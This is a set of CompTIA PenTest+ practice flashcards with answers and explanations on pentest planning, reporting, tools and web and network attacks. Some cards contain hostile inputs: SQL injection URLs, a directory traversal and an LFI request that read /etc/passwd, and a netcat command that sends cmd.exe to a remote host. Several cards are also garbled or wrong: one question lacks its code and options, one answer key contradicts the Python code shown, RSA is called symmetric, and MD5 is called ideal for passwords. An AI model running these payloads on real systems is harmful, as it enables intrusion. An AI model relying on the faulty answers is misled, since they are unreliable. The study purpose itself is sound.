CompTIA PenTest+ Practice Test - Results (Solomon) Flashcards

1
Q
Which type of testing forces the pentester to gather information using creative methods and sources and typically does not provide any upfront customer knowledge of the environment to be tested?
A.White box
B.Black box
C.Goals-based
D.Gray box
A

B.Black box

Explanation

Correct Answer: Black box is correct. Black box testing forces the pentester to gather information using creative methods and sources prior to being able to conduct the testing. No company-confidential knowledge is available to the tester other than what is legally required to define and limit the scope of the assessment.

Incorrect Answers: White box is incorrect because full access to internal knowledge is provided to the pentester prior to and during white box testing.

Gray box is incorrect because company-confidential knowledge may be made available to the pentester prior to or during gray box testing.

Goals-based is incorrect because it is a type of assessment that attempts to evaluate the security within an organization through a simulated cyber-attack. The pentest team may or may not have company-confidential information available prior to and during the attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Which of the following options is an example of Boolean-based SQL injection? (Choose two.)
A.www,example.com/info.php?id-1 AND 1=1
B.www.example.com/info.php?id=2 AND 3=4
C.www.example.com/info.php?id=1;UNION SELECT * from mysql.users;–
D.www.example.com/info.php?id-2;2

A

A.www,example.com/info.php?id-1 AND 1-1
B.www.example.com/info.php?id=2 AND 3=4

Explanation

Correct Answers: www.example.com/info.php?id=1 AND 1=1 and www.example.com/info.php?id=2 AND 3=4 are correct. Boolean-based SQL injection (SQLi) is where you ask the database true (e.g., id=1 AND 1=1) or false (e.g., id=2 AND 3=4) questions and determine the answer based on the response given by the application, where the response could be a content error or a blank page.

Incorrect Answers: www.example.com/info.php?id=2;2– is incorrect because it terminates the query with a semicolon.

www.example.com/info.php?id=1;UNION SELECT * from mysql.users;– is incorrect because it is a union query SQL injection that builds on top of the original SELECT() statement used in the query to extend the query results beyond what it was intended to query.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
Which of the following options provides guidance for planning and conducting technical information security tests?
A.NIST SP 800-37
B.DoD 8570
C.NIST SP 800-115
D.FIPS 199
A

C.NIST SP 800-115

Explanation

Correct Answer: NIST SP 800-115 is correct. National Institute of Standards and Technology (NIST) SP 800-115 provides a technical guide to information security testing and how to conduct these types of tests.

Incorrect Answers: DoD 8570 is incorrect because DoD 8570 is a policy used to address the information technology (IT) certification needs of the U.S. federal government.

NIST SP 800-37 is incorrect because NIST SP 800-37 provides guidance on how to apply the Risk Management Framework (RMF) to U.S. federal information systems.

FIPS 199 is incorrect because Federal Information Processing Standard (FIPS) 199 is the U.S. federal government standard that established security categories of information systems, based on impact levels for confidentiality, integrity, and availability

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
Which of the following stakeholders from an organization might be interested in the findings and success of a penetration test?
A.Contracting or legal department
B.Executive management
C.IT Department
D.All of the answer choices are correct
E.The pentest team
A

D.All of the answer choices are correct

Explanation

Correct Answers: All of the answer choices are correct. All the options identify important roles within an organization that may be interested in the findings and success of a penetration test.

The IT department may be interested in the specific tests and methodology the pentester executed during the assessment so that the same steps can be followed during a re-test to validate the installation and security effectiveness of any mitigations applied against the vulnerabilities.

The contracting or legal department will want to ensure that all legal and contractual obligations were upheld by both parties involved during the pentest.

Executive management might want to gain a better understanding of the security posture of the entire organization, both to ensure that the organizational IT budget is sufficient to support remediation efforts and to influence organizational security policy changes or decisions, as necessary.

The pentest team would be interested in the success of the pentest because this team is responsible for executing the testing and drafting the findings and remediation for the organization.

All of the other choices are incorrect as individual responses because each stakeholder plays an important role in the success of a penetration test, making choice E the correct answer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
The unquoted service path vulnerability can be used to escalate privileges on a Windows target and exploits what function of the operating system?
A.Weak access controls
B.CreateProcess
C.TaskSceduler
D.Windows Registry
A

B.CreateProcess

Explanation

Correct Answer: CreateProcess is correct. Unquoted service paths are a direct result of the CreateProcess function in Windows operating systems, where the name of a directory or program in the search path is truncated when the function identifies a blank space in the path. Windows will attempt to load each truncated executable until it finds the correct one.

Incorrect Answers: Task Scheduler is incorrect because the Task Scheduler is a Windows component used for managing the execution of Windows scheduled tasks.

Weak access controls is incorrect because weak access controls is a misconfiguration of the operating system, not a function.

Windows registry is incorrect because the Windows registry is a collection of databases of Windows configuration settings, not a function of the operating system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

The customer uses unattended installation files to automate configuration of both physical and virtual hosts on the network. The remote file share that contains the unattended installation files is writable by everyone on the network. What mitigation would you recommend to the customer to help secure their network? (Choose three.)
A.Lock access to share down based on domain access
B.Restrict write access to only trusted hosts
C.Discontinue using unattended installation
D.Restrict access based on IP address

A

A.Lock access to share down based on domain access
B.Restrict write access to only trusted hosts
D.Restrict access based on IP address

Explanation

Correct Answer: Lock access to share down based on domain access, restrict access based on IP address, and restrict write access to only trusted hosts are correct. They enforce an access control to restrict who or what can access the unattended installation file share.

Incorrect Answers: Discontinue using unattended installation is incorrect because it describes a personal preference, and doesn’t provide a mitigation to help the customer resolve the underlying weakness with the world-writable network share.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
When conducting network and enumeration scanning on the customer's network, your team requests operating system information to help with the vulnerability mapping process. Given the following nmap syntax, which of the following options can help provide OS fingerprinting?```nmap -vv -n -Pn -sSVC -O -T4 -p- 10.1.10.0/24 -oA 10.1.10.0.syn```
A.'-sSV'
B.'-n'
C.'-Pn'
D.'-O'
A

D.’-O’

Explanation

Correct Answer: -O’ is correct. The -O option can be used with Nmap to help fingerprint the operating system.’-

Incorrect Answers: ‘-n’ is incorrect because the -n option is used to prevent hostname lookups.

‘-Pn’ is incorrect because -Pn disables host discovery.

‘-sSV’ is incorrect because -sSV is used to execute a TCP SYN scan with version detection for each open service/port found during the scan.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Which of the following can be used as a defense-evasion technique? (Choose three.)
A.Encoding an x86 WIndows payload with shikata_ga_nai
B.Using MD5 to encode a password that can be used in Mimikatz with PtH on a Windows network
C.Base64-encoding a PowerShell command to execute against a remote host on the network
D.CHanging and modifying code from the “invoke-Mimikatz.ps1’
scripts from PowerSploit to evade antivirus signature detection

A

A.Encoding an x86 WIndows payload with shikata_ga_nai

C.Base64-encoding a PowerShell command to execute against a remote host on the network
D.CHanging and modifying code from the “invoke-Mimikatz.ps1’
scripts from PowerSploit to evade antivirus signature detection

Explanation

Correct Answers: Encoding an x86 Windows payload with shikata_ga_nai is correct because shikata_ga_nai is a valid encoding that can be used with msfvenom to hide a potentially malicious payload.

Changing and modifying code from the Invoke-Mimikatz.ps1 script from PowerSploit to evade antivirus signature detection is correct because the signature detection from an antivirus program can be bypassed if enough of the code can be modified to emulate a little different behavior during runtime.

Base64-encoding a PowerShell command to execute against a remote host on the network is correct because base64 encoding can be used to obfuscate commands that are executed on the system. If a network IDS or host-based IDS (HIDS) is not configured to investigate that type of obfuscation, the malicious activity could go undetected.

Incorrect Answers: Using MD5 to encode a password that can be used in Mimikatz with PtH on a Windows network is incorrect. MD5 is a cryptographic hashing algorithm, not an encoder, and it cannot be used with pass-the-hash (PtH) techniques on a Windows network, as the hash values are required to be NTLM.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

The customer is using SSH for remote logins and transferring files to hosts on the local area network. However, you also found FTP and Telnet open on most of the Unix servers in the customer environment. The system administrator says they don’t use those legacy programs any longer. How would you document this in a pentest report, even though you did not exploit these services?
A.Ask for additional time to test the services
B.Record this as a critical finding
C.Do not address this in the report, since the services are on the LAN and are not exposed to external attacks
D.Include as an “unnecessary open services observation in the executive summary

A

D.Include as an “unnecessary open services observation in the executive summary

Explanation

Correct Answer: Include as an “unnecessary open services” observation in the executive summary is correct. Testing observations, such as the use of unnecessary open services, can be addressed in the executive summary section of the pentest report. This can help management know there may be inconsistent practices used for administration of the network, or a lack of configuration management guidance. These types of cultural issues can be remediated with the help of a top-down management approach for senior leadership to set the vision and delegate subordinates to carry out the new organizational goals.

Incorrect Answers: Record this as a critical finding is incorrect because the observation is not a finding, as the legacy services were not able to be exploited.

Do not address this in the report, since the services are on the LAN and are not exposed to external attacks is incorrect because documenting in the pentest report any noteworthy observations, and ones that might point out a bigger picture of a problem, should be done for senior leadership so they can be addressed and prioritized accordingly. In the case of unnecessary services, if you find that most of the hosts on the network have not been patched in over year, and they are running legacy services, this is evidence that the customer is failing to follow industry best practices on the network in more places than one, which could be a cultural issue (lack of knowledge, expertise, or motivation) or a resource issue (not enough system administrators) in the organization.

Ask for additional time to test the services is incorrect because this could introduce scope creep and affect the timely delivery of the pentest report to the customer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
Which of the following can assist you with brute-forcing a web application login page? (Choose three.)
A.CeWL
B.Wordlist
C.XSS
D.CSRF
E.Hydra
A

A.CeWL
B.Wordlist
E.Hydra

Explanation

Correct Answers: Wordlist is correct because a wordlist will provide login password possibilities based on a dictionary of words and commonly used passwords.

CeWL is correct because CeWL is a tool used to scrape web pages to derive a wordlist with which to target specific organizations.

Hydra is correct because Hydra is a tool used to help automate the login process, which can allow the pentester to make the most efficient use of his time.

Incorrect Answers: XSS and CSRF are incorrect. Cross-site scripting (XSS) and cross-site request forgery (CSRF) can be used to capture login credentials, user session data, and sensitive information, or force a user to perform a malicious action, but neither technique will help brute-force login a web page.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

!/bin/bash

What does the following script do?

today=$(date +%Y=%m-%d)

log_dir=”/var/www/logs”

dst+dir=”/tmp/logs”

count=$(ls $log_dir | wc -l)

if [ $count -gt 0 ] then

echo “Moving $count logs on $today”&raquo_space;/var/www/moveLog.txt

mv $log_dir/* $dst_dir

for i in ‘ls $dst_dir’; do

scp -i key $dst_dir/$i webusr@logsrvr:/logs/websrv1/www

echo $dst_dir/$i

rm -rf $dst_dir/$i

done

else

echo “No files to move $today”&raquo_space;/var/www/moveLog.txt

fi
A.Secure copies the files and then removes the files from the remote host
B.Moves log files to another directory, then secure copies the files to another host using ‘scp’, and the removes the files that were secure copied
C.Copies log files to another directory and then removes all the logs
D.Moves log files to another directory and then secure copies the files to another host using a password

A

B.Moves log files to another directory, then secure copies the files to another host using ‘scp’, and the removes the files that were secure copied

Explanation

Correct Answer: Moves log files to another directory, then secure copies the files to another host using scp, and then removes the files that were secure copied is correct. The bash script counts the number of files in the $log_dir directory, and then uses a conditional statement to verify that there are indeed files in that directory. If there are files in the $log_dir directory, then the script proceeds to move the files to the $dst_dir directory, then secure copies the log files from $dst_dir to the logsrv host, then removes the files from $dst_dir after they have been secure copied.

Incorrect Answers: Copies log files to another directory and then removes all the logs is incorrect because the script does not remove all the logs once it copies them to another directory.

Moves log files to another directory and then secure copies the files to another host using a password is incorrect because the secure copy is done with an SSH key, not a password.

Secure copies the files and then removes the files from the remote host is incorrect because the script does not remove the file from the remote host.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Which of the following is a valid reason for executing an authenticated vulnerability scan against a target?
A.It produces more findings
B.It helps to reduce false positives
C.You will be able to show more impact in your test results
D.The scan will help exploit target weaknesses and carry out post-exploitation activities

A

B.It helps to reduce false positives

Explanation

Correct Answer: It helps to reduce false positives is correct. Executing an authenticated vulnerability scan can help reduce the number of false positives reported by a vulnerability scanner, as the credential used during the scan will have the ability to verify a patch or configuration setting, whereas an unauthenticated scan will go off a service banner or trivial fuzzing technique that may or may not be enough to guess at the existence of a vulnerability.

Incorrect Answers: It produces more findings is incorrect because running an authenticated scan against a target will not necessarily produce additional findings.

You will be able to show more impact in your test results is incorrect because an authenticated vulnerability scan can help verify the existence of a vulnerability and report on the impact or severity of the vulnerability, but showing impact in your test results is based on how you test and the findings you can produce.

The scan will help exploit target weaknesses and carry out post-exploitation activities is incorrect because an authenticated vulnerability scan may execute some tests to validate a vulnerability, such as using code to test for Shellshock, but its primary focus is to detect and report vulnerabilities, not to carry out post-exploitation activities

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Using the following example PHP code, what type of attack could this application be susceptible to?Example HTTP GET request:

http://www.example.com/test.php?img=photo1.png
Example PHP code:```
A

C.Directory traversal attack

Explanation

Correct Answer: Directory traversal attack is correct. The example URL will attempt to retrieve photo1.png from the web server and render the image in the browser. The example PHP code shows that the value of the img= parameter, photo1.png, should be retrieved from $WebDir, which points to the local file system path of '/var/www/html'. However, because the code provides no input validation, it could be susceptible to a directory traversal to access files outside the intended location using ../../../../etc/passwd.

Incorrect Answers: SQLi is incorrect because the application would not be susceptible to SQL injection as there is no mention of a database function within the code.

Directory indexing is incorrect because the PHP code does not execute directory indexing. Clickjacking is incorrect because clickjacking is a client-side attack that tricks users into clicking on a button or link within a web page they were not intending to interact with.

This attack makes use of CSS, iframes, and even text boxes to load legitimate web content through an attacker-controlled web page.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
Which of the following Windows shares are readable on the local area network by default?
A.All of the answer choices are correct
B.C$
C.ADMIN$
D.IPC$
A

D.IPC$

Explanation

Correct Answer: IPC$ is correct. The IPC$ share, also known as the null session share, allows anonymous hosts on the network to perform certain activities such as enumerating domain accounts and network shares.

Incorrect Answers: ADMIN$ and C$ are incorrect because the ADMIN$ and C$ Windows shares are only accessible over the network by local or domain administrator accounts.

“All answers are correct…” is incorrect because not all of the shares are readable by anonymous users on the network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q
Which testing methodology or methodologies should an organization consider when scoping and planning for an engagement? (Choose all that apply.)
A.Black box
B.White box
C.Gray box
D.All of the answer choices are correct
A

D.All of the answer choices are correct

Explanation

Correct Answers: All of the answers are correct. All of the answers are testing methodologies that should be considered when planning and scoping an engagement.

Black box testing can help an organization understand the complexity involved with information gathering and, when given enough time, attacking/exploiting the organizational environment when no company confidential knowledge is provided.

White box and gray box testing could help the organization streamline the testing process, to assist with evaluating various types of external and internal attack vectors, such as insider threats. All three of these testing methodologies could help an organization gain a better understanding of their operational defense capabilities, and their ability to defend against real-world threats.

Incorrect Answers: All of the other choices are incorrect as individual responses because an organization should consider all three testing methodologies when scoping and planning for an engagement, making choice “All answers” the correct answer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

When using the airodump-ng tool to collect wireless network packets, why would you want to define the channel to listen on?
A.You should always specify the channel your target is listening on when conducting wireless surveys and exploitation activities
B.When attempting to crack the wireless encryption key or four-way handshake, its best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks
C.Channel hopping is a technique used by airodump-ng to determine the channel a target host is listening on
D.Use the same channel as your target wireless device will help speed up the time necessary to crack the PSK offline

A

B.When attempting to crack the wireless encryption key or four-way handshake, its best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacksB.When attempting to crack the wireless encryption key or four-way handshake, its best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks

Explanation

Correct Answer: When attempting to crack the wireless encryption key or four-way handshake, it’s best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks is correct. The airodump-ng tool will hop from channel to channel and restrict your ability to collect all of the packets necessary to recover the WEP key or four-way handshake from a WPA network. Camping out on the specific channel will help increase the odds of successful exploitation.

Incorrect Answers: You should always specify the channel your target is listening on when conducting wireless surveys and exploitation activities is incorrect because there are certain times when using a specific channel would be advantageous over not defining the channel, as in the case of attacking the Wireless Encryption Protocol.

Using the same channel as your target wireless device will help speed up the time necessary to crack the PSK offline is incorrect because the time required to crack the PSK is dependent on other external factors such as CPU power, time, word lists, rules, and so on, and is unrelated to the channel the target device is using for communication.

Channel hopping is a technique used by airodump-ng to determine the channel a target host is listening on is incorrect because it describes the channel-hopping technique but doesn’t answer the question of why it would be better to use a single channel versus a channel-hopping technique.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q
Which of the following algorithms can be used to generate a cryptographic hash value for a password?
A.RSA
B.Base64
C.AES
D.MD5
A

D.MD5

Explanation

Correct Answer: MD5 is correct. Message Digest 5 (MD5) is an algorithm that takes a variable-length string (message) of input and turns it into a fixed-length hash value (message digest), where the primary objective is integrity, such that the hash value cannot be returned to its original string value and makes hashing an ideal candidate for storing passwords.

Incorrect Answers: AES and RSA are incorrect because the Advanced Encryption Standard (AES) and Rivest, Shamir, and Adleman (RSA) are used for symmetric key encryption, and are used for encrypting and decrypting sensitive information and for authentication purposes.

Base64 is incorrect because base64 encoding is a type of obfuscation and is easily reversible.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
Which of the following commands can you use to query information from an organizations OpenLDAPserver?
A.'accesschk.exe'
B.'ldapsearch'
C.'searchsploit'
D.'net group'
A

B.’ldapsearch’

Explanation

Correct Answer: ldapsearch is correct as this command can be used to look for querying the LDAP server.

Incorrect Answers:searchsploit is incorrect because the searchsploit command is a Kali Linux command that can search through local exploit-db contents to look for public exploit code.

net group is incorrect as net group is used in Windows operating systems to list the local groups the host knows about.

accesschk.exe is incorrect because accesschk.exe is a local operating system console program used to identify users or groups that have access to specific resources, such as files, directories, Windows services, etc.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q
What is the purpose of a table of contents in the pentest report?
A.To provide page numbers
B.To organize the report
C.To list headings and subheading
D.All of the answer choices are correct
A

D.All of the answer choices are correct

Explanation

Correct Answer: All of the answers are correct. The table of contents will help organize the report, list the headings and subheadings, and provide page numbers.

Incorrect Answers: The other answers are incorrect when individually selected, as all of the answers are correct.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q
Which of the following are considered examples of threat actors? (Choose four.)
A.Advanced persistent threat
B.Pentester
C.Script kiddies
D.Hacktivist
E.Insider threat
A

A.Advanced persistent threat
C.Script kiddies
D.Hacktivist
E.Insider threat

Explanation

Correct Answers: Insider thread, script kiddie, advanced-persistent threat and hactivist. They are all different types of threat actors that can pose a significant risk to an organization, depending on the intent and capabilities of the threat actor and how the organization defends against the threat.

Incorrect Answer: Pentester is incorrect because a pentester is not a threat actor, but though this role can simulate the activity of a threat actor in a particular group, depending on the type of assessment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

The username and password of admin/admin could be considered which of the following?
A.Weak credential
B.Susceptible to brute-force or password guessing attacks
C.All of the answer choices are correct
D.Default credential

A

C.All of the answer choices are correct

Explanation

Correct Answer: All of the answers are correct. All of the answers provided are examples of what the credentials admin/admin could be. A default credential is typically a password configured from the factory for embedded devices, Wi-Fi home routers, Internet of Things (IoT) devices, etc. Weak credentials are passwords that fail to meet some level of password complexity, which could leave the password susceptible to brute-force or password guessing attacks.

Incorrect Answers: All of the other choices are incorrect as individual responses because all the answers are examples of what the credentials admin/admin could be. The choice that says all of the answers are correct is the best answer.

22
Q

When should you dispose of the customer’s pentest report and sensitive data? (Choose the BEST answer.)
A.After the customer debrief
B.Never
C.The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE
D.Once the customer confirms receipt of the pentest report

A

C.The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE

Explanation

Correct Answer: The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE is correct. Once the customer has provided confirmation of successfully receiving and extracting the report, all remaining digital or written copies of the report should be marked for proper disposal and deletion, based on agreed-upon methods outlined in the rules of engagement (RoE).

Incorrect Answers: Never is incorrect because the pentest report should be removed based on the disposal requirements defined by the customer.

Once the customer confirms receipt of the pentest report is incorrect because once the customer confirms receipt of the pentest report, it can be deleted; however, the RoE can also define when the report should be properly disposed of.

After the customer debrief is incorrect because the debrief is a post-engagement activity that happens after the customer has acknowledged receipt of the pentest report and has had time to digest its content. They can then request a debrief (or “outbrief”), if necessary.

23
Q
Which of the following utilities can be used to enumerate NFS share information from a file server over the network? (Choose two.)
A.'nfs-shwmount.nse'
B.'showmount'
C.'rpcinfo'
D.All of the answer choices are correct
A

A.’nfs-shwmount.nse’
B.’showmount’

Explanation

Correct Answers: Showmount is correct because the showmount command can be used to enumerate NFS shares from a Unix or Linux NFS file server.

Nfs-showmount.nse is correct because nfs-showmount.nse can be used with the Nmap Scripting Engine to enumerate share information from NFS servers over the network.

Incorrect Answers: Rpcinfo is incorrect because the rpcinfo command can be used to report remote procedure call (RPC) information from a host, such as the mount port (e.g., 4096/tcp) and NFS server port (i.e., 2049/tcp) and the versions (v2, v3, or v4) of NFS supported on the remote server, but not the NFS file shares being served out to the network.

“All of the choices” is incorrect because ‘rpcinfo’ is incorrect.

24
Q

!/usr/bin/python

Which exception will be printed when the characters 123!@# are provided as input to the program based on the following Python code?

try:

i - int(input(“Enter your favorite number: “))

break

except NameError:

print(“Name Error Exception”)

except SyntaxError:

print(“Syntax Error Exception”)

except:

print("Generic Error")
A.Keyboard Interrupt Exception
B.Generic Exception
C.Name Error Exception
D.Syntax Error Exception
A

D.Syntax Error Exception

Explanation

Correct Answer: Syntax Error Exception is correct. The SyntaxError exception is used in Python to catch parsing errors in the input, such as when using the following characters in the sample program: $%^&*. When the program reads the user-supplied input, Python will catch the error and, because there is a handler for this type of exception, the print statement will print “Syntax Error Exception” and continue on in the loop and allow the user to try to enter in the correct input, which is a valid number/integer. If there was not a handler written in the program, Python would terminate the program upon receiving the invalid syntax input and print the built-in syntax error message.

Incorrect Answers: Name Error Exception is incorrect because the NameError exception is when an unrecognized local or global name is referenced.

Generic Exception is incorrect because that exception would not catch any errors, as the other two exceptions cover all invalid characters that could be entered. Keyboard Interrupt Exception is incorrect because it is the KeyboardInterrupt exception, which can be executed using the CTRL-Z keyboard sequence.

25
Q
The following HTTP POST request is an example of what type of attack?```POST /request.php?id=php://input&cmd=cat%20/etc/passwd HTTP/1.1```
A.Local file inclusion (LFI)
B.Directory traversal
C.Remote file inclusion (RFI)
D.Cross-site request forgery (CSRF)
A

A.Local file inclusion (LFI)

Explanation

Correct Answer: Local file inclusion (LFI) is correct. Local file inclusion (LFI) attacks include files outside of the web root and render the contents of local operating system files to the browser window. In some cases, LFI could lead to remote code execution using PHP wrappers, such as the input stream, as shown in the example HTTP POST request, which can allow you to read raw data (such as PHP code to execute system commands) from the request body.

Incorrect Answers: Remote file inclusion (RFI) is incorrect because remote file inclusion (RFI) allows files or even whole pages to be displayed inside the vulnerable web page from another location, such as a web server.

Directory traversal is incorrect because directory traversal browses outside of the web root, and would not be used to execute a command such as the one found in the example cmd= parameter.

Cross-site request forgery (CSRF) is incorrect because cross-site request forgery (CSRF) is a client-side injection attack that causes a user to perform an action against a trusted website where the user is already authenticated with a valid session. The example code in this question targeted a command in the body of the POST request to execute the cat command and read the local password file from the web server.

26
Q
The schedule is an important element to include in the report, as it helps put findings into perspective, such as how long it took to find a particular vulnerability and the time it took to exploit it. This section in the report can be referred to as what?
A.Issues
B.Observations
C.Timeline
D.Methodology
A

C.Timeline

Explanation

Correct Answer: Timeline is correct. The timeline is an important part for senior leadership to understand because it puts findings into perspective, such as how long it took to find the vulnerability, the time it took to exploit it, and so on.

Incorrect Answers: Methodology is incorrect because the methodology describes the techniques used to execute the pentest.

Issues is incorrect because the issues section describes any technical or administrative issue that negatively impacted the execution of the testing activities. Alternatively, you might mention “no issues or incidents to report” to the customer, to help send a positive message that reassures senior leadership that everyone was able to work together to accomplish the objective(s).

Observations is incorrect because observations help senior management know some things concerning the culture of the organization that they may or may not already know, such as poor password policies.

27
Q
Which fully executed document provides authorization from an organization to conduct a pentest and will include or elaborate on subjects defined in the SOW?
A.Contractual agreement
B.MSA
C.NDA
D.RoE
A

D.RoE

Explanation

Correct Answer: RoE is correct. The rules of engagement (RoE) document puts into writing the guidelines and constraints regarding the execution of a pentest and typically elaborates on subjects defined in the SOW, such as the testing methodology, target selection, etc. Once the RoE is signed by an authorizing official within the organization (executive management) and all other respective parties, the fully executed (FE) document provides the pentest team with the authorization to carry out the agreed-upon terms and conditions.

Incorrect Answers: NDA is incorrect because a nondisclosure agreement (NDA) is a confidentiality agreement that protects a business’s competitive advantage by protecting its proprietary information and intellectual property. This document is fully executed by both parties (signed into action) prior to working together.

MSA is incorrect because the master service agreement (MSA) is a type of overarching contract between two or more parties where each party agrees to most terms that will govern all other future transactions and agreements. The MSA does not cover competitive advantages to protect each business; this document is used to cover other items such as payment terms, dispute resolution, corporate social responsibility, business ethics, network and facility access, etc.

Contractual agreement is incorrect because a contractual agreement is a type of agreement such as an MSA, SOW, etc. and does not, by itself, elaborate on the subjects defined in the SOW.

28
Q
Which type of assessment is required for organizations that accept, process, or store consumer payment card information?
A.DISMA
B.Red Team
C.PCI DSS
D.HIPAA
A

C.PCI DSS

Explanation

Correct Answer: PCI DSS is correct. The Payment Card Industry Data Security Standard (PCI DSS) assessment is required for organizations who accept, process, or store payment card information for consumers and merchants.

Incorrect Answers: HIPAA is incorrect because a Health Insurance Portability and Accountability Act (HIPAA) assessment is for organizations that manage personal health information (PHI).

Red team is incorrect because a red team assessment is used to simulate advanced persistent threats (APTs) on an organization’s network.

FISMA is incorrect because Federal Information Security Management Act (FISMA) assessments are for organizations that use government networks and are mandated under U.S. federal regulations.

29
Q

What is senior (executive) management’s role in a top-down management approach?
A.To dictate goals and objectives
B.None of the answer choices are correct
C.TO carry out the plan of action for the organization
D.To update the organizations policy documentation

A

A.To dictate goals and objectives

Explanation

Correct Answer: To dictate goals and objectives is correct. A top-down management approach is when senior management dictates goals and objectives regarding a project or task.

Incorrect Answers: To carry out the plan of action for the organization is incorrect because carrying out the plan of action for the organization is the role of subordinates, or lower-tier management, to ensure there is a successful plan of action for senior leadership’s goals and objectives.

To update the organization’s policy documentation is incorrect because senior leadership’s roles in a top-down management approach is to provide guidance on how something should be done, and allow the lower levels of management to put the plan into action, which could be updating an organization’s policy documentation.

None of the answer choices are correct is incorrect because there was a correct answer for this question.

30
Q

What is this command doing?

nc 192.168.1.50 4444 -e cmd.exe

A.Forward a command shell from the local WIndows host to a remote host over the network
B.Forward a command shell from the local Linux host to a remote host over the network
C.Forward a command shell from the remote host to the local Linux host over the network
D.Forward a command shell from the remote host to the local WIndows host over the network
A

A.Forward a command shell from the local WIndows host to a remote host over the network

Explanation

Correct Answer: Forward a command shell from the local Windows host to a remote host over the network is correct. The netcat (nc) utility can be used to forward data to remote hosts over the network. The command in this example is forwarding a command shell from the local Windows host to a remote host listening on port 4444/tcp.

Incorrect Answers: Forward a command shell from the local Linux host to a remote host over the network is incorrect because the shell that is being forwarded is a Windows command shell (cmd.exe), which suggests the local host is Windows.

Forward a command shell from the remote host to the local Linux host over the network and Forward a command shell from the remote host to the local Windows host over the network are incorrect because the command is connecting to the remote host IP address of 192.168.1.50. If the connection were to the local host, the loopback address of 127.0.0.1 could be used, but otherwise there is no need to connect back to the local host if the pentester already has access to the target box.

31
Q

The customer has requested the pentest report be encrypted and e-mailed to the project manager identified in the RoE. From the following choices, which option reduces the risk of unauthorized disclosure?
A.Encrypt the email and report then send decryption password for the report via text message
B.Encrypt the email and report then send the decryption password for the report via another email
C.Encrypt the email and report and send them to the project manager
D.Encrypt the report and then send the decryption password and the report in the same email

A

A.Encrypt the email and report then send decryption password for the report via text message

Explanation

Correct Answer: Encrypt the e-mail and report then send the decryption password for the report via text message is correct. Using different transport paths for sending the report and decryption password can help maximize continuity and reduce the risk of unauthorized disclosure, should one path become compromised.

Incorrect Answers: Encrypt the e-mail and report and send them to the project manager and encrypt the e-mail and report then send the decryption password for the report via another e-mail are incorrect because using the same delivery mechanism for the decryption password does not reduce the risk level as much as using an alternate path.

Encrypt the report and then send the decryption password and the report in the same e-mail is incorrect because the delivery path does not include sending the encryption password via an alternate path from the report.

32
Q
Which of the following options can be used to conduct vulnerability research?
A.All of the answer choices are correct
B.CWE
C.CVE
D.CAPEC
A

A.All of the answer choices are correct

Explanation

Correct Answer: All of the answers are correct. The Common Attack Pattern Enumeration and Classification (CAPEC), Common Weakness Enumeration (CWE), and Common Vulnerabilities and Exposures (CVE) are all used for conducting vulnerability research.

Incorrect Answers: All of the other choices are incorrect as individual responses . All of the answers are correct for this question.

33
Q
Which type of confidential document covers items such as social responsibility, business ethics, network and facility access, and so forth?
A.SOW 
B.NDA
C.MSA
D.RoE
A

C.MSA

Explanation

Correct Answer: MSA is correct. The master service agreement (MSA) is a type of overarching contract between two or more parties where each party agrees to most terms that will govern all other future transactions and agreements, such as payment terms, dispute resolution, social responsibility, business ethics, network and facility access, etc.

Incorrect Answers: SOW is incorrect because the statement of work (SOW) is used to address contractual subjects such as the problem to be solved, the work activities, the project deliverables, and the timeline for when the work is to be completed.

RoE is incorrect because the rules of engagement (RoE) mirrors some of the contents of the SOW and includes technical constraints regarding the execution of the pentest, such as what is and is not authorized during the pentest.

NDA is incorrect because a nondisclosure agreement (NDA) is a confidentiality agreement that protects a business’s competitive advantage by protecting its intellectual property and proprietary information.

34
Q

The HTTPOnly attribute that can accompany a Set-Cookie response header is responsible for which of the following?
A.Defining the URL where the cookie is valid
B.Setting the Secure flag to only allow for SSL connectors
C.Defining the domain where the cookie is valid
D.Preventing the cookie from being accessed via JavaScript

A

D.Preventing the cookie from being accessed via JavaScript

Explanation

Correct Answer: Preventing the cookie from being accessed via JavaScript is correct. The HTTPOnly attribute will prevent a user (or attacker) from accessing the cookie value from a JavaScript request, such as through JavaScript’s Document.cookie API (e.g., alert(document.cookie)).

Incorrect Answer: Setting the Secure flag to only allow for SSL connectors is incorrect because the Secure flag is an attribute by itself in the Set-Cookie header to ensure that the cookie never makes its way over a nonencrypted connection, like HTTP.

Defining the domain where the cookie is valid is incorrect because the Domain attribute in the Set-Cookie header is used to define the domain where the cookie is valid.

Defining the URL where the cookie is valid is incorrect because the Path attribute in the Set-Cookie header is used to define the URL where the cookie is valid.

35
Q
Which network share is available to any member of an organization's Windows Active Directory domain and holds Group Policy Preferences (GPP) to help automate tedious administrative tasks?
A.IPC$
B.ADMIN$
C.C$
D.SYSVOL
A

D.SYSVOL

